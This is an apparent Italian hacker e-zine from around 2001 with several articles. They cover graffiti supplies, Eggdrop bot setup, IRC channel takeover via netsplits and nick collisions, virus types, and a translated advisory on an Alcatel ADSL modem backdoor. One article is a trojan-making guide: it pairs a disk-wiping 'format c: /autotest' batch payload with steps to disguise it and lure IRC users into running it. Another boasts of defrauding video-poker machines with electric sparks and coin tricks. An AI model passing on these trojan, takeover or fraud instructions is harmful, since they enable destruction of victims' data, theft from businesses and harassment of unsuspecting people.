felton tanke(feltonspray dalla redazione mi dice che son le meglio..non lo so,rilasciano uno strato "gommoso" e vanno bene anche sui muri umidi...quante volte ci siamo trovati sotto la pioggia a non saper cosa fare con una bomboletta?!?)
talken(normali...qua le mettono a 11mila e sono le uniche bombolette decenti...ormai le ordino via telefono ai vari negozi le bombolette...se da voi costano poco pigliatele)
happy color(che sgrezze mamma mia...ve le sconsiglio)
vi ho elencato solo le marche + famose...ce ne sono molte altre!
ricordate che non tutti i caps vanno su tutte le bombolette!
TAPPINI o caps
molti tipi di tappini,non posso elencarli tutti,e non tutti vanno su tutte le bombolette
vi dico i + semplici e famosi
fat cap(fanno lo spruzzo molto grosso,usateli per i riempimenti,ma sprecano molta vernice...)
big fat(come sopra...ma lo spruzzo è + grosso)
skinny,skinny banana ecc...(lo spruzzo è normale...io senza skinny non sopravvivo,lo uso anche nei riempimenti,è il migliore)
direzionale(ecco un cap strano...fa lo spruzzo a righe)
soft(mai usati, e non ricordo a cosa servono...forse per gli outline)
SILENZIATORE
silenziatore...no non toglie il rumore del gas,ma della pallina all'interno della bomboletta,quante volte vi trovate in mezzo alla gente con nello zaino una bomboletta mezza vuota che fa trrrrrrrrrrrrrrrr trrrrrrrrrrr e tutti vi guardano male...il silenziatore è una calamita molto forte che va applicata sul fondo della bomboletta così attrae la pallina e il gioco è fatto
ho ancora tempo...l'articolo mi sembra un po' vuoto...proseguiamo
hey raga compratevi della carta adesiva,schiaffatevi sopra la vostra tag,il vostro sito o che cazzo volete e andate in giro attaccando gli stickers di qua e di là,semplice no?e veloce!vai con lo streetteam raga!www.beatuno.com il primo streetteam nazionale italiano!
con questo chiudo,ci ribecchiamo il prossimo numero,vi racconterò qualcosa sulla cultura hiphop se ce la faccio...magari faccio un articolo sulla ganja e fumo...magari per questo numero...mo chiedo a cookbooker...ci si becca bro
ricordatevi: è ARTE NON VANDALISMO...
per finire cito alcuni versi...
"chi non segue il gregge sa leggere tra le rime...l'hiphop è un mezzo,non un fine!..."
"col cazzo che ci freni,mettetevi sereni,che devasteremo nel deposito dei treni..."
LOTTA ARMATA!
PEACE and RESPECT for allLlLll
FRE[E]STO aka L4cR1 l'acilico
www.ebclick.cjb.net
#doppiah freesto@libero.it
______________________
| _ _____ _____ |
| | | | _ \ / ___| |
| | | | |_| | | | |
| | | | _ / | | |
| | | | | \ \ | |___ |
| |_| |_| \_\ \_____| |
----------------------
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
o __ __ _|_ __ | | __ __ ___ __ |__ __ _|_
| | ) __) |_, (__( |_, |_, (__( | ' (__/_ (__(_ | ) |__) (__) |_,
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
[Titolo: Installare un bot]
[Autore: Cookbooker]
Alura... se state leggendo questo artikolo vuol dire ke, probabilmente, avete bisogno di un bot... kome? kos'è un bot!? Umh... beh, diciamo ke un bot serve a "proteggere" un chan (o a fotterne uno :o)), il bot è un utente fisso di IRC, una volta oppato nel vostro chan soltanto voi e i vostri amici potrete essere oppati.
Un bot deve essere installato su una shell, si trovano molte shell gratuite... MA non vanno bene per installarci un bot, le shell gratuite, infatti, una volta ke vi siete disconnessi, terminano tutti i processi da voi attivati e quindi anke il bot... :o\
Kosa possiamo fare?
1) affittare una shell
2) hackarla :)
Nel kaso vogliate affittarne una :P eccovi una lista di Provider ke offrono spazio per il vostro
bot:
××××××××××××××××××××××××××××××××××××××××××××××××××××××
×××××××××××××indirizzo×××××××××××××××××××prezzo×××××××
××××××××××××××××××××××××××××××××××××××××××××××××××××××
»http://www.dungeonfyre.com««««««««««««« $ 15.00 »»»»»
»http://www.unixrules.net««««««««««««««« $ 15.00 »»»»»
»http://www.ssc.no/««««««««««««««««««««« Kr 900 »»»»» (N.d.R. e ke kazzo di moneta è?)
»http://www.shellnow.it««««««««««««««««« $ 20.00 »»»»»
»http://www.falco.com««««««««««««««««««« $ 10.00 »»»»»
»http://www.jeah.net«««««««««««««««««««« $ 12.00 »»»»»
»http://www.reverse.net««««««««««««««««« $ 10.00 »»»»»
»http://www.vtshell.com««««««««««««««««« $ 20.00 »»»»»
»http://www.theshell.com«««««««««««««««« $ 10.00 »»»»»
»http://www.lomag.net««««««««««««««««««« $ 8.00 »»»»»
××××××××××××××××××××××××××××××××××××××××××××××××××××××
Una volta ottenuta una shell decente (in un modo più o meno legale;), non vi rimane ke installare il bot seguendo i seguenti passi...
1. collegatevi tramite telnet (avvio-->segui--> "telnet indirizzo") al server, accedete alla vostra shell;
2. scompattate il bot (prendiamo kome esempio l'Eggdrop) col seguente comando:
gunzip nome_eggdrop.tar.gz
tar xf nome_eggdrop.tar
(dove nome_eggdrop è il nome del file contenente il bot)
3. cancellate ora il formato tar col comando:
rm nome_eggdrop.tar
4. ora entrate nella directory in cui avete installato l'eggdrop:
cd nome_eggdrop
5. ora non ci rimane ke configurare il nostro bot, per fare questo usate il seguente comando:
./configure
ora aspettiamo un po... se la shell può ospitare il bot non avremo problemi...
usate ora il comando "make"; ora possiamo cominciare a costruire il file di configurazione che definirà il nick del bot, i servers che userà e tutti gli altri parametri necessari al suo funzionamento
{SETTAGGIO BOT:}
i kommenti saranno evidenziati dal simbolo "#"
#definiamo l'amministratore del bot
set admin "vostronick"
#diamo un nick al nostro pikkolo... :)
set nick "CookBot"
#settiamo l'Ident del bot
set username "nomebot"
#decidiamo che nickname userà il bot nel kaso ke il su nick principale
#sia okkupato
set altnick "CookB0t2"
#settiamo il "real name"
set realname " Underground Magazine! umcrew.tsx.org "
#definiamo i servers che verranno usati dal bot
set servers {
irc.tin.it
}
#decidiamo un canale in cui potremo trovare sempre il bot
set confchan "#umcrew"
Questi erano i settaggi principali.... ora possiamo avviare il nostro bot:
./cartella_eggdrop -m cookbot.conf
cartella_eggdrop è il nome della cartella in cui risiede il bot, mentre il file cookbot.conf è il file di configurazione.
Bene! Tra poki minuti, se tutto è stato fatto correttamente, il nostro bot sarà in IRC e a noi non resterà ke farci identificare usando il seguente comando da IRC:
/msg NickBot hello
A questo punto il Bot ci kiederà di settare una password e noi risponderemo kosì:
/msg NickBot pass tuapassword
Ora ABBIAMO IL NOSTRO BOT! :o))
···············································································
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
_|_ __ |__, ___ __ ___ __
|_, (__( | \ (__/_ (__) (__| (__/_ | '
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
[Titolo: TakeOVERiamo un CANLE IRC]
[Autore: FeltonSpray]
"DiScLaImEr"
Ragazzi io non mi assumo nessuna responsabilità sull'uso che ne farete di questo
artikolo, se usate quanto scritto per rompere le balle in IRC siete solo LAMER
io ho scritto questo testo per farvi capire come si fà un TAKE OVER non per
stimolarvi a farli quindi .... InIzIaMo
Per usare queste tecniche come sempre avrete bisogno di LINUX il mio amore!!!!
e di due tool facilmente reperibili su qualsiasi sito che tratta l'Hacking!
allora:
MCB: Tool che ci permette con un nick collision di far espellere un op dal canale
dai BOT! =)
Link Looker: Tool che ci informa quando un server sta per Splittare naturalmente
se siete nuovi di irc o non sapete che significa splittare lasciate
perdere questo artikolo NON FA' PER VOI!
Facciamo un pò di Teoria:
Il take over è un'atto di impadronimento di una room di IRC, spesso questi attacchi
vengono fatti in room con persone poco competenti infatti e difficile in una room
più seria che ciò avvenghi visto la presenza di almeno una decina di bot! cmq la room
#hacker e quasi sempre takkata =) hehe, premetto che i bot se sono settati bene e
viaggiano su linee veloci sarà una cosa complicata buttarli giù e sopratutto nei server
dove esiste anche il grado di OWNER (irc.msn.com) da op normali non potete fare un DEOP
agli OWNER ma qui ci sono io a spiegarvi un pò qualcosa:
Mettete in "MOTO" il link looker e guardate l'andamento del server preso di mira, lui vi
informa appena il server sta per andare in Split e voi ricollegandovi subito sarete
automaticamente @ =) ma purtroppo esistono i bot che proteggono i canali più seri ed allora
scende in gioco MCB che creandovi un clone di un operatore in caso di split al ritorno i bot
trovano 2 nick uguali e li butta fuori per NICK COLLISION e voi ritornate nella room e sarete
op e potete deoppare i bot e restare li magari settando il canale PRIVATO CON PASS =) e non +
di 4 utenti cioè voi ed almeno 3 bot vostri =) così da non far mai più utilizzare la room =)
Naturalmente in caso di server che riconosce il grado OWNER non potrete deoppare i bot naturalmente
settati come owner (+q)!
Spero di essere stato chiaro per tutti anche sè non capite fa lo stesso manco io ci ho capito niente
ma l'importante che funziona! Prima di lasciarvi vi dò una kikka che forse alcuni conoscono ed altri
no: Vi è mai capitato su irc di trovare persone sempre connesse in gni momento della giornata?? I casi
sono due ho è figlio di un dirigente TELECOZ =) oppure usa un IRC BOUNCER, questo irc bouncer installato
su una vostra shell permette di restare on-line anche quando siete of-line e tutte le query vengono
tranquillamente loggate e viste al momento del ritorno on-line! ciao a tutti a presto.....
[]---[FeLtOnSpRaY]---[]
>>--> feltonspray@katamail.com <--<<
_______________________________
| _ _ _ _____ _ _ |
|| | / / | | | _ \ | | | | |
|| | / / | | | |_| | | | | | |
|| | / / | | | _ / | | | | |
|| |/ / | | | | \ \ | | | | |
||___/ |_| |_| \_\ |_| |_| |
-------------------------------
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
_
o __ __ o __ |_ __ __ __ __ __ _|_ o __ o
(__| | | ' (__(_ __) | | ) | (__) | ' | ) ) (__( |_, | (___ |
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
[Titolo: alcuni tipi di virus]
[AUTORE: Jrash]
Salve sono il vostro amico Jrash (N.d.R. ci conosciamo? °_°), in questo articolo
vorrei parlarvi dei virus, tutti sapete cosa cono ma io vi parlero di loro in modo
approfondito, dicendovi i danni che possono provocare e una sorta di loro struttura. Buona lettura!!!
Esistono essenzialmente tre famiglie di virus che poi si dividono in tanti altri
sottogruppi, esaminiamo prima le grandi famiglie:
Worms
Trojan
Virus
Iniziero' col parlarvi dei Worms e poi mi addentrero' nella descrizione dei virus
veri e propri dal momento che richiede piu' tempo ed e' una faccenda un po' piu'
complessa.
Worms
Il primo Worm fu creato intorno agli anni '80 da Robert Morris, un giovane che
ebbe la brillante idea di creare un virus non dannoso, ma che si riproduceva
via Internet, ebbene si, usava un bug indovinate di quale programma? Ovviamente
del Sendmail, molti computer andarono in tilt per l'immane riproduzione del
verme, in pratica a quel tempo tutti avevano almeno 10-12 vermi in casa, anche
i non pescatori ;))))
Su Internet si puo' trovare facilmente il codice sorgente del vermone, ho sentito
dire che e' stato inserito un errore nel codice per non farlo compilare, se e'
vero non lo so.
Tutt'oggi non esistono vermi noti poiche' con le nuove versioni del sendmail
sono stati corretti i bug che ne permettevano la proliferazione, oggi questo
ignobile programma e' perfetto quasi al 100% l'unico problema (di importanza
praticamente nulla) e' che possiamo ottenere il "root" su un sistema di rete
semplicemente mandando una mail ;)))
Si sa che questi programmatori tolgono un bug e ne creano 20, bho!!!
Anche se non ve ne freghera' assolutamente nulla, vi dico che ho uno zio Italiano
ma che vive in Finlandia che contribuisce tuttora allo sviluppo di Linux e del
software ad essi necessario, quindi guai a parlar male dei loro prodotti ;)))
Dicevamo che vermi noti non ce ne sono, pero' con l'avvento di Linux credo che
questo fenomeno crescera'.
Trojan
I trojan, o meglio Trojan Horse (cavalli di Troia) sono stati (a quanto ne so')
la prima forma di virus esistente, dovrebbero essere stati creati la prima volta
in Russia da un team di programmatori, i trojan sono dei programmi che non hanno
alcuna intenzione di duplicarsi ma servono solo a fare danni in un computer,
anche le bombe logiche sono dei trojan, solo che si attivano in un determinato
periodo. Un ottimo esempio di trojan e' il NetBus o il Back Orifice, ma anche
noi possiamo creare un trojan facendo un file batch, scrivendoci dentro:
format c: /autotest
e convertendolo con il Bat2Com.
Se poi lo vogliamo rendere invisibile bastera' criptarlo a compattarlo (petite.exe,
pklite.exe ecc..).
Il nome cavallo di Troia e' dato dal fatto che vengono spesso diffusi come altri
programmi.
Virus
I virus si differiscono dai Trojan per il fatto che tendono a restare nascosti
ed a riprodursi il piu' possibile.
Windows e' un virus ???
Nooo Win non e' un virus. Questo e' cio' che fanno i virus...: Si replicano
velocemente.. O.K.
Win fa' questo come i Virus.....
Il virus usa tutte le risorse di sistema, rallentando il sistema come ultimo.
Percio' O.k. Win fa cio'.
Un virus di tanto in tanto riduce in spazzatura il tuo HD, O.K. anche Win lo fa.
I virus sono di norma portati all'insaputa dell'utente in tutti i programmi
principali..... Sigh!!!
Anche Win lo fa.
Un virus fa venire il sospetto di esserci poiche' il sistema diventa troppo
lento... e fa venire la voglia di comperare nuovo Hardware. Oddio vale anche
per Win.
Sino ad ora tutto fa sembrare che Win sia un virus.... ma ci sono alcune
differenze fondamentali:
I virus sono ben supportati dall'autore, Funzionano su ogni tipo di sistema...
il loro codice programma e' estremamente veloce, compatto ed efficiente, e
tendono a diventare sempre piu' sofisticati con l'andare della loro evoluzione....
Percio' Windows [ NON ] e' un virus....
Ok andiamo ora ad esaminare i vari tipi di viruz:
Sector (Master Boot Record / Floppy Boot Record):
Questo tipo di virus e' stato uno dei primi, attaccano il settore di avvio
degli H.D.D. oppure dei floppy, per togliere questi virus, spesso basta
scrivere al prompt del DOS:
fdsik /mbr
questo comando ripulisce il Master Boot Record, non utilizzatelo assolutamente
se avete installato un Boot Loader (lilo, loadlin, syslinux, boot manager ecc..)
altrimenti verra' cancellato.
Questi viruz erano dannosi una volta quando avevamo bisogno del "disco di
supplemento" per avviare il dos, oggi non fanno quasi piu' nulla a meno che
non accendiamo il pc con un dischetto infetto dentro e nel BIOS abbiamo
settato l'opzione che cerca un floppy all'avvio, se ci sono queste condizioni
allora sono kazzi.
Macro
Virus di nuova concezione scritti in Visual Basic, possono essere inseriti
nelle macro del lotus, word e di altri programmi, se apriamo il file senza
avviare la macro non succede nulla, ma se non lo facciamo rischiamo di
riportare danni (si parte dalla semplice impossibilita' di salvare un documento
alla formattazione del disco duro).
I macro virus sono sempre di piu', ma per sconfiggerli basta solo non attivare
le macro ;))))
File
Questi si dividono in Residenti e Non-Residenti:
Residenti: Una volta avviato il programma sul quale era ospite rimane attivo
per sempre.
Non-Residente: Smette di funzionate quando viene chiuso il programma ospite.
Questo tipo di viruz una volta avviato apre a caso dei file e copia dentro di
loro la routine di infezione (i virus hanno questo nome proprio perche' si
comportano come quelli esistenti in natura, cioe', entrano in una cellula (il
file) attaccano il loro DNA (la routine di infezione) al DNA della cellula
(il codice del programma) la cellula continua a funzionare normalmente solo
che altera qualche sua funzione e poi muore per lisi (esplosione))
MultiPartito
Questi si comportano sia come i Sector virus (o boot virus) sia come i File
viruz, in pratica si attaccano come le piattole al boot e quando vengono
caricati attaccano i vari altri file del sistema, i floppy, gli eseguibili
del dos ecc..Un esempio e' sicuramente il mitico Junkie.1027
Cluster (File System viruses)
Secondo me questi sono i tipi di viruz piu' "belli", questi modificano la
tabella dei contenuti sull'Hard Disk in modo da far avviare prima il virus e
poi il software.
Come sempre saluto i miei amici, e in paricolare KeWl, A[v]a[t]A[r],
ghent, Norman_B e la stupenda Giada.......lol
ByEzZ............alla proxima.......CiAuZz...
02/04/2001
= = = = = = = = = = = = h t t p : / / u m c r e w . t s x . o r g = = = = = = = = = = =[Jrash]°
···············································································
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
__ __ ___ __ __ ___ _|_ __ __ | __ __ __
(___ | ' (__/_ (__( | ' (__/_ |_, | ' (__) (__, (__( | ) __)
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
[Titolo: GUIDA ALLA CREAZIONE DEI TROJAN]
[Autore: Jrash^^]
[Crew : UMc's member]
[E-mail: jrash@hackersat.com]
[URL : www.hackersat.com - http://umcrew.tsx.org]
Salve ragazzi, in questo articolo vorrei parlarvi dei trojan e in particolare cosa sono e addirittura come crearne uno...che vi posso dire?? una sola cosa : Buona lettura!!!! I Trojan sono una serie di istruzioni che vengono fatte eseguire dalla vittima inconsapevolmente. Talvolta possono formattare l'hard disk o altri scritti in linguaggio C che, messi opportunamente su un server, possono mandarvi via e-mail tutti i login e le password degli utenti. Se avrete bravura con il Linguaggio C, con un po' di fantasia, riuscirete a crearne uno per ogni esigenza. Se non conoscete il linguaggio C non scoraggiatevi si possono creare in qualsiasi modo(Nota By Cookboker: non solo in C! esiste anke Delphi, dio can!;). Nei file batch, in visual basic, in Pascal, etc. Per crearne uno cosi' potete fare ciò:
1) Create un file BAT con le istruzioni che vorrete far essere eseguite sul computer vittima
2) Procuratevi l'utility BAT2COM che serve a trasformare un file BAT in COM
3) Rinominate un file mettendoci un nome credibile
4) Per rendere il tutto ancora più realistico create un file vuoto di qualche kb. Come? In questo modo: andate in dos e scrivete:
DEBUG NOME
-F 100,F000,0
-RCX
:EA60
-W
-Q
si creerà un file di 60 kb con il nome di NOME. Ora utilizzate l'opzione: copy /b file.com+nome cheneso.com
dove file.com sarà il file con i comandi, nome sarà il file che abbiamo creato con debug mentre cheneso.com sarà il file finale che vorrete creare.
5) Prima di zippare il tutto create un file di testo dove fate finta di spiegare cosa c'è nel file com oppure se siete abili con l'ascii potrete far finta che il file è stato scaricato da una BBS.
6) Zippate il tutto.
Ora è venuto il momento di decidere a chi affibbiare questo file. L'unica cosa che vorrei dirvi è che non dovrete usarlo contro persone normali perchè pensate che una cosa del genere può capitare anche a voi. Andate su irc e prendete di mira quei canali dove ci sono solo degli stupidi lamers che tentano di nukkare ognuno. Ditegli se vorrà un programma che manda nuke che fanno suicidiare il modem o qualcosa del genere. Alla vostra proposta non potrà rifiutare e lo accetterà. Sapete che emozione vederlo cadere da Irc perchè quello che si dovrà suicidiare non sarà il modem ma lui!
N.B.Cook: Se non avete BAT2COM non c'è nessun problema: lo trovate negli allegati! ;)
Pensate che una volta ne ho creato uno che quando veniva avviato si bloccava e dava un errore ma in realta sostituiva un'altro file all'autoexec.bat. Quando il poveretto riavviava il computer si vedeva prima una bella scritta di insulti e trovava l'hard disk formattato. Ma come, quando si scrive format dopo non bisogna dare la conferma? Si è vero ma nonna Microsoft ha incluso l'opzione /autotest che formatta l'hard disk senza chiedere la conferma. Bello eh? Dunque usai il comando: Format c: /autotest /q /u che equivale a una formattazione incondizionata ed anche veloce.
Mi raccomando usateli senza spregiudizi, usateli contro coloro che fanno i maligni!!!ihihih!!
Ci sentiamo...al prossimo articolo...ByEzZ.......
__________________________________________
| _____ _____ _ _ _____ _____ |
| / _ \ |_ _| | | | | | ____| | _ \ |
| | | | | | | | |_| | | |__ | |_| | |
| | | | | | | | _ | | __| | _ / |
| | |_| | | | | | | | | |___ | | \ \ |
| \_____/ |_| |_| |_| |_____| |_| \_\ |
------------------------------------------
×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
|\| |¯ \ \/ / ¯/
| | |¯ \/\/ /_
¯
×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
[ HALLO ]
Si kiamo "Hallo" (il virus :P) e si sta diffondendo grazie ad MSN Messenger inviandosi ai
componenti della rubrica della vittima. Il worm è stato realizzato in VB 5 e usa kome oggetto
"i have a file for u. its real funny" ("ho un file per te. E' veramente divertente").
Questo worm si può diffondere soltanto nei pc aventi installato MSN Messenger di MiCro$oft
(Microsoft è il male ;o)).
[ Modem ADSL Alcatel bucato ]
Dopo le akkuse di Shimomura (sarà skritto giusto? :)), famoso per aver avuto un ruolo kiave nella
cattura di Mitnick (as Condor), il CERT afferma ke i modem ADSL di Alcatel sono affetti da
numerosi bug, facilmente sfruttabili da kome avete potuto notare leggendo l'artikolo di Cujo.
[ 50.000 $ a ki riesce a violare un sistema ]
Secure Computing ha "bandito" un konkorso ke konsiste nel crackare un sistema difeso dai firewall
dell'azienda, e questa volta non lo si fa solo per lo skopo di dimostrare la propria superiorità
ma lo si fa per più di 100 milioni di lire. :))
[ Bucato ADDR.com ]
Sono stati sottratti più di 46 mila account kontenenti dati kome: Nome, Cognome e carta di
credito! A quanto pare i numeri delle karte di kredito vengono già usati illecitamente.
···························································································
×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
__ __ __ |__, o __ ___ _|_ _|_ ___ __| __ __ __ |__, ___ __
| ) ) (__( | \ | | ) (__/_ |_, |_, (__/_ (__| (__( |__) (__) | \ (__/_ | '
×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
[Titolo: come fregare la macchinette dei poker del bar]
[Autore: FeltonSpray]
[ DISCLAIMER ]
Ragazzi se mettete in pratica quanto scritto rischiate anche una denuncia per
furto quindi occhio a ciò che fate e non rompete i coglioni a me e ditelo
anche ai vostri legali che io non ESISTO! =)
[ INIZIAMO ]
Ieri come al solito ero alla sala giochi xxxxx xxxx xxxxxx con i miei amici
mentre notavo che un mio amiko ("NALDI" HIHIH)mi spiegava un giochetto (non sessuale ;p)
quindi scappiamo al Tabacchino a comprarci un accendino ma quello con la
scintilla elettrica non quello con le pietrina (insomma quello a scatto)
datogli £ 2.000 :-( ci siamo messi ed abbiamo rotto l'accendino per prendere
solo la parte dove tu scatti e fa la scintilla elettrica. Adesso corriamo come pazzi
ed arrivamo alla sala giochi e cominciamo a mandare scariche elettriche sui
giochi ma solo in uno ci riuscimmo (ricordate usate solo quelli che danno tiket)
dopo provato a mandare cariche in diverse parti (non erogene ;p) un bellissimo
suono di tilt si scatenò e magicamente cominciarono ad uscire tiket a valanga
quasi subito spegnemmo il gioco per arrestarne l'uscita,
il tilt lo abbiamo fatto scatenare sulle viti del vetro, da provare dove escono i ticket per
bene!!!
e dopo una mezzoretta che ci siamo scambiati 10 karte in gettoni,
tornammo con la nostra bella lista di tiket e gli abbiamo detto che avevamo fatto pocherissimo a 10 pezzi (450.000 £)
infatti gli portammo tot tiket ed abbiamo guadagnato 225.000 £ a testa.
Stamattina il gioco non c'era +, lo avevano cambiato (chissa come mai). Adesso
andiamo in un'altra sala giochi non contenti del guadagno, dopo una mezzora di
occhiate in giro, sperimentiamo sto coso e un'altra situazione ci sconvolse, dopo
trovato il punto magico, la macchina non ci diede tiket ma ci caricò il
massimo dei crediti (provate a pensare quanto!!!) ci siamo messi a giocare ma
eravamo troppo sospetti, giocammo per un pò, ci scaricammo 100.000 a testa e
gli lasciammo una marea di crediti, beato chi se li gode intanto noi in 2 giorni
ci siamo fatti 325.000, adesso andremo in altre salagiochi vedremo che succede.....
se mi arrestano venite a farmi visita :-) (Screeny me le porti le sigarette?? :p)
ASCOLTATE CERCATE SEMPRE VIDEOPOKER A TIKET MA DI MODELLI VECCHI CON I NUOVI NON CI
SIAMO RIUSCITI, OCCHIO AL RESPONSABILE DELLA SALA SE VI BECCA VI SCASSA DI BASTONATE,
VEDETE CHE SE VI DENUNCIANO PASSATE I GUAI PER FURTO, CERCATE SALA GIOCHI LONTANE
DA DOVE FREQUENTATE, NON FATE COME NOI CHE ADESSO NON POSSIAMO RIENTRARCI PIU' :-(
E CMQ IO NON SONO RESPONSABILE DI CIO CHE FARETE!!!!
...
Tempo dopo, sempre con NALDI, abbiamo notato che la parte dove inserite i gettoni
subisce spesso una rottura, in pratica non riesce a distinguere bene il valore del
pesoe della grandezza delle monete quindi usate sempre macchine vecchiotte cambiatevi
una banconata da mille in 20 * 50 £ e sperimentate se li prendono, cmq non mollate
fateli 10 tentativi per macchina, noi ne abbiamo trovate un paio e con 5.000 pensate
quanti crediti ci carichiamo =) eheh non so se funziano con tutti ma di sikuro con
le vecchie avrete più possibilità.
Ho notato anche che i padroni delle salagiochi (almeno quella che frequento) lascia le
chiavi dei vari giochi dentro un gioco e conserva solo una chiave!!! Quindi cercate
di forzare in qualche modo il gioco se ci riuscite SIETE RICCHI!! Pensate in quanti
giocano hai poker in un giorno mettete che ci sono 20 poker ($$$$$$$$$ =).
Beh ragazzi bisogna solo sperimentare tutto qui cmq ricordatevi:
ASCOLTATE CERCATE SEMPRE VIDEOPOKER A TIKET MA DI MODELLI VECCHI CON I NUOVI NON CI
SIAMO RIUSCITI, OCCHIO AL RESPONSABILE DELLA SALA SE VI BECCA VI SCASSA DI BASTONATE,
VEDETE CHE SE VI DENUNCIANO PASSATE I GUAI PER FURTO, CERCATE SALA GIOCHI LONTANE
DA DOVE FREQUENTATE, NON FATE COME NOI CHE ADESSO NON POSSIAMO RIENTRARCI PIU' :-(
E CMQ IO NON SONO RESPONSABILE DI CIO CHE FARETE!!!!
CIAO A TUTTI DA
[]---[FeLtOnSpRaY]---[]
>>--> feltonspray@katamail.com <--<<
P.S. Se troviamo altri sistemi vi terrò informati e faremo il 3 TXT sui furti ai
video poker =)
···························································································
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
__ __ __ __| ___ __ __ __ __| __ | __ | __ __ _|_ ___ |
| ) ) (__) (__| (__/_ | ) ) (__( (__| __) |_, (__( |_, (___ (__( |_, (__/_ |_,
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
[Titolo: Modem ADSL Alcatel, backdoor?]
[Tradotto da: Cujo]
Oggetto: vulnerabilità multiple nel modem ADSL Alcatel
I. Sommario
Ricerche in collaborazione con il San Diego Super Computer Center dell' Università della California,San Diego, hanno rilevato diverse estensioni nel modem ADSL Speed Touch Alcatel ( attualmente un router/bridge ADSL-Ethernet ).
Queste estensioni permettono ad un attacker di prendere il completo controllo del dispositivo,cambiare la configurazione,aggiornare firmware,e manipolare la connessione tra la centrale telefonica del provider e il dispositivo.
Queste estensioni permettono le seguenti azioni:
* cambiare la configurazione del dispositivo, come renderlo inaccessibile.
* disabilitare il dispositivo,sia temporaneamente che permanentemente ( richiede la riparazione da parte del costruttore )
* installazione di codice,come network sniffer per controllare il traffico locale LAN e rendere il dispositivo facilmente accessibile dall'esterno.
Una delle scoperte più interessanti è stata una backdoor a risposta crittografica che bypassa completamente una qualsiasi password che un utente può aver settato nel dispositivo.
Tutti i test sono stati eseguiti in modalità bridge LLC/SNAP.Non è stato testata la modalità router,il che non esclude che ci siano altre estensioni facilemte exploitabili in questo modo.
(Speed Touch è un marchio registrato di Alcatel)
II. I dispositivi Alcatel Speed Touch
Questo advisory interessa la famiglia di dispositivi Speed Touch e similari apparentemente basati sul codice come i vecchi Alcatel 1000 ADSL Network Temination device (1000 ADSL). Tutti i test sono stati effettuati sullo "Speed Touch Home" e solo alcuno sul 1000 ADSL.E' probabile che il software nello "Speed Touch Pro" sia molto simile a quello nello Speed Touch Home, dunque è probabile che anche il Pro sia vulnerabile a questo tipo di attacchi.Anche altri software derivati dallo stesso codice potrebbero avere in comune le stesse vulnerabilità.
Le estensioni decritte sono state dimostrate in tutte le versioni firmware dello Speed Touch Home,comprese:
KHDSAA.108 Jul 6 14:03:12 GMT 1999
KHDSAA.132 Nov 19 13:52:05 GMT 1999
KHDSBA.133 Mar 16 17:52:08 GMT 2000
KHDSAA.134 Apr 24 12:48:43 GMT 2000
L'alcatel 1000 ADSL non ha passwords settabili e dunque non ha in comune la back door crittografica con lo Speed Touch Home.
Ha una vulnerabilità in più per il quale non può essere ristretto il suo accesso HTTP e condivide la vulnerabilità TFTP descritta più avanti con lo Speed Touch Home. La versione del software del 1000 ADSL era la seguente:
KA1HAA.112 Jan 26 09:51:00 GMT 1999
Per default,il dispositivo usa come indirizzo ip 10.0.0.138,che può essere cambiato via HTTP,FTP o linea di comando (TELNET).Il dispositivo può avere più indirizzi ip contemporaneamente.
III. Le estensioni implementate
Ci sono diverse estensioni,incluse quelle per l'autenticazione;servers FTP totalmente accessbili, e una mancanza di firmware autenticati o scaricati.
III.A Varie caratteristiche del sistema di autenticazione dell'utente
Il dispositivo ha diverse estensioni e una "feature" interessante nell'area dell' autenticazione.
III.A.1 Porta principale aperta - Nessuna password di default
Il dispositivo permette l'accesso read/write alla configurazione senza bisogno di password.Questo può essere fatto via FTP o TELNET.La struttura dei file system dei dispositivi può essere esaminata via FTP.
http://www.vnunet.fr/actu/article.htm?numero=6197&date=2000-11-06
III.A.2 La password può essere rubata/cambiata
La password,se settata, può essere estratta dal dispositivo via TFTP.Oppure TFPT può venir usato per cambiare la password esistente.Nessuna di queste operazione richiede alcun tipo di autenticazione ( :D N.d.T. ). Vedere (III.B) per l'uso di TFTP.
III.A.3 Back door crittografica - bypassare completamente la password
Se per qualche motivo non è conviente ottenere o cambiare la password con TFPT, può essere direttamente bypassata accedendo come "EXPERT",che invocherà una sequenza in risposta crittografica.La password sarà il risultato della funzione crittografica applicata alla stringa presentata immediatamente prima la richiesta della password.Per esempio,l'output FTP e TELNET appaiono simili a questi:
ftp> open 10.0.0.138
Connected to 10.0.0.138.
220 Inactivity timer = 120 seconds. Use 'site idle <secs>' to change.
Name (10.0.0.138:root): EXPERT
331 SpeedTouch (00-90-D0-00-00-00) User EXPERT OK. Password required.
Password:
230 OK
ftp>
telnet> open 10.0.0.138
Trying 10.0.0.138...
Connected to 10.0.0.138.
Escape character is '^]'.
User : EXPERT
SpeedTouch (00-90-D0-00-00-00)
Password : ##########------------------------------------------------------------------------
*
* ______
* ___/_____/\
* / /\\ ALCATEL ADSL MODEM
* _____/__ / \\
*
_/ /\_____/___ \ Version 3.2
* // / \ /\ \
* _______//_______/ \ / _\/______ Copyright 1999-2000.
* / / \ \ / / / /\
* __/ / \ \ / / / / _\__
* / / / \_______\/ / / / / /\
* /_/______/___________________/ /________/ /___/ \
* \ \ \ ___________ \ \ \ \ \ /
* \_\ \ / /\ \ \ \ \___\/
* \ \/ / \ \ \ \ /
* \_____/ / \ \ \________\/
* /__________/ \ \ /
* \ _____ \ /_____\/
* \ / /\ \ /
* /____/ \ \ /
* \ \ /___\/
* \____\/
*
-----------------------------------------------------------------------
=>
In tutti e due i casi sopracitati,la stringa è
